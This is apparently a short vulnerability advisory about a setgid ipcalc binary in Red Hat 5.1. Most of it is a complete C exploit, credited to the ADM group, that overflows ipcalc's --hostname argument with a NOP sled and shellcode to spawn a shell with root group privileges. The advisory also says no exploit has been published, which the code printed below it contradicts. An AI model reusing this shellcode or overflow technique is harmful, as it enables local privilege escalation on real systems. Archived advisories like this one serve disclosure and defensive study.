COMMAND

    ipcalc

SYSTEMS AFFECTED

    RedHat 5.1

PROBLEM

    The /sbin/ipcalc  binary in  the Red  Hat 5.1  initscripts had the
    setgid bit  turned on  inadvertently, which  may give  local users
    access to the root group (no exploit has been published yet).

    /****   ADM PRIVATE -- DO NOT DISTRIBUTE
    
      one-minute RedHat 5.1 /bin/ipcalc exploit
      by plaguez from ADM.  Gives you egid=0.
    
      Greets to all ADM ppl.
    
    ****/
    
    
    #include <stdio.h>
    #include <unistd.h>
    
    
    char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh\x0";
    
    
    
    #define CHAINE "/bin/ipcalc --hostname \"12.12.12.1 $BIDULE\""
    #define SCSIZE 4096
    #define BOSIZE  240
    #define DEFAULT -1000
    
    unsigned long get_esp(void) {
       __asm__("movl %esp,%eax");
    }
    
    
    void main(int argc, char * argv[])
    {
      char sc[SCSIZE],bo[BOSIZE];
      int offset = DEFAULT;
      long *addr;
    
      if(argc > 1)
        offset -= atoi(argv[1]);
    
      addr = get_esp() - offset;
    
      printf("\ntarget addr: 0x%x\n",addr);
    
      for(addr=(long*)bo;addr<(long*)&bo[BOSIZE-1];addr++)
        *addr=get_esp()-offset;
      bo[BOSIZE-1]='\x0';
    
      memset(sc,'\x90',SCSIZE);
      memcpy(sc+SCSIZE-strlen(shellcode)-1,shellcode,strlen(shellcode));
      sc[SCSIZE-1]='\x0';
    
      setenv("MACHIN",sc,1);
      setenv("BIDULE",bo,1);
    
      system(CHAINE);
    
    }

SOLUTION

    Fixed.